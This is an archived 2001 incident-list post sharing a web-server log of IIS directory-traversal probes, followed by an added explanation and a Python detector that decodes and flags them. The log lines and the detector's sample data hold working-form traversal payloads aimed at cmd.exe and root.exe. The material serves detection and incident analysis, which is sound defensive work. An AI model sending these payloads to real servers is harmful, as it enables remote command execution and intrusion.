Hello everybody,

has anyone seen this pattern of IIS attacks before? Could this be a new exploit tool or something like "nimda2"? On the other hand it seems that it is only trying the long known holes...

------------------------------- snip ----------------------------------
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
------------------------------------ snap --------------------------------

Timestamps are GMT+1. Any hints?

Regards,
Thomas Haeberlen

--
Thomas Haeberlen
Rechenzentrum Universitaet Stuttgart (RUS)
Abteilung Informationsdienste
Allmandring 30, D-70569 Stuttgart
Email: haeberlenat_private-stuttgart.de
Phone: +49 711 685 47 19
Fax: +49 711 678 76 26

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:23:36 PST
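The requests in the post are the classic IIS traversal probes: `%C0%AF`, `%C1%9C` and `%C1%1C` are overlong or malformed UTF-8 encodings of `/` and `\` that unpatched IIS 4/5 canonicalised into path separators (MS00-078), and `%255c`, `%252f`, `%25%35%63` and `%%35c` are double-encoded or broken percent escapes that IIS decoded a second time after its path check (MS01-026). To see what such a line is actually asking for, a log analyser has to decode it the way the target server would, not just once. The script below is an added example, not code from the original post or the list: it parses Apache-style combined log lines, applies repeated percent decoding plus the overlong-UTF-8 mappings, counts the traversal depth, classifies the encoding trick used, and flags requests that aim `cmd.exe` or `root.exe` with a `/c` argument. The sample lines are constructed in the same shape as the posted log (RFC 5737 address, not the original source IP); the `OVERLONG` table lists only the sequences visible in the post plus the well-known `%E0%80%AF` three-byte form.

```python
"""Decode IIS traversal-probe URLs from Apache combined-log lines and flag them."""
import re
from collections import Counter

# Constructed sample lines in the shape of the posted log (not the original data).
SAMPLE_LOG = """\
203.0.113.9 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\\ HTTP/1.0" 404 210 "-" "-"
203.0.113.9 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 404 234 "-" "-"
203.0.113.9 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 404 240 "-" "-"
203.0.113.9 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 400 215 "-" "-"
203.0.113.9 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 403 258 "-" "-"
203.0.113.9 - - [30/Oct/2001:11:50:02 +0100] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Combined log format: ip ident user [ts] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Overlong / malformed UTF-8 that unpatched IIS turned into path separators (MS00-078).
OVERLONG = {b'\xc0\xaf': b'/', b'\xc1\x9c': b'\\', b'\xc1\x1c': b'\\', b'\xe0\x80\xaf': b'/'}
HEX = b'0123456789abcdefABCDEF'
PROBE_RE = re.compile(r'(^|/)(cmd|root)\.exe$', re.I)


def decode_once(raw: bytes) -> bytes:
    """One %XX pass. A '%' not followed by two hex digits is kept literally,
    which is exactly why '%%35c' becomes '%5c' and then '\\' on the next pass."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i:i + 1] == b'%' and len(raw) >= i + 3 and raw[i + 1] in HEX and raw[i + 2] in HEX:
            out.append(int(raw[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(raw[i])
            i += 1
    data = bytes(out)
    for seq, rep in OVERLONG.items():
        data = data.replace(seq, rep)
    return data


def canonicalise(target: str, max_passes: int = 3):
    """Decode until stable. Returns (path with '/' separators, raw query, passes that changed something).
    Two or more effective passes is the MS01-026 double-decode signature."""
    data, changes = target.encode('latin-1'), 0
    for _ in range(max_passes):
        nxt = decode_once(data)
        if nxt == data:
            break
        data, changes = nxt, changes + 1
    path, _, query = data.decode('latin-1').partition('?')
    return path.replace('\\', '/'), query, changes


def encoding_class(target: str) -> str:
    """Name the evasion trick used in the raw request target."""
    t = target.lower()
    if '%%' in t:
        return 'malformed-percent'
    if '%25' in t:
        return 'double-url-encoded'
    if re.search(r'%c[01]%|%e0%80%', t):
        return 'overlong-utf8'
    return 'plain'


def analyse_line(line: str):
    """Return a finding dict for a traversal/shell probe, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, query, changes = canonicalise(m['target'])
    segments = path.split('/')
    depth = sum(seg == '..' for seg in segments)
    shell = bool(PROBE_RE.search(path)) and query.lstrip('/').lower().startswith('c+')
    if depth == 0 and not shell:
        return None
    return {'ip': m['ip'], 'status': int(m['status']), 'raw': m['target'], 'decoded': path,
            'depth': depth, 'encoding': encoding_class(m['target']),
            'decode_passes': changes, 'shell_probe': shell}


def summarise(log_text: str) -> dict:
    """Aggregate findings; 'successful' holds shell probes the server answered with 200,
    which is the case that needs an incident response rather than a note in the log."""
    hits = [h for h in map(analyse_line, log_text.splitlines()) if h]
    return {'hits': hits,
            'per_ip': dict(Counter(h['ip'] for h in hits)),
            'encodings': dict(Counter(h['encoding'] for h in hits)),
            'statuses': dict(Counter(h['status'] for h in hits)),
            'successful': [h for h in hits if h['shell_probe'] and h['status'] == 200]}


if __name__ == '__main__':
    report = summarise(SAMPLE_LOG)
    for h in report['hits']:
        print(f"{h['ip']} {h['status']} {h['encoding']:<19} passes={h['decode_passes']} "
              f"depth={h['depth']} {h['decoded']}")
    print('per ip:', report['per_ip'], '| encodings:', report['encodings'])
    print('statuses:', report['statuses'], '| successful shell probes:', len(report['successful']))
```

The status column matters more than the request text: Apache answering 404 (or 400 for the `%%35c` forms, which it rejects as malformed escapes) means the probe found nothing, whereas a 200 on a `cmd.exe?/c+...` request is the signal to treat the host as compromised. Decoding also makes the scan's intent visible: the `/_vti_bin`, `/PBServer`, `/Rpc` and `/samples` variants all differ only in how many `..` segments are needed to climb from that virtual directory to the drive root.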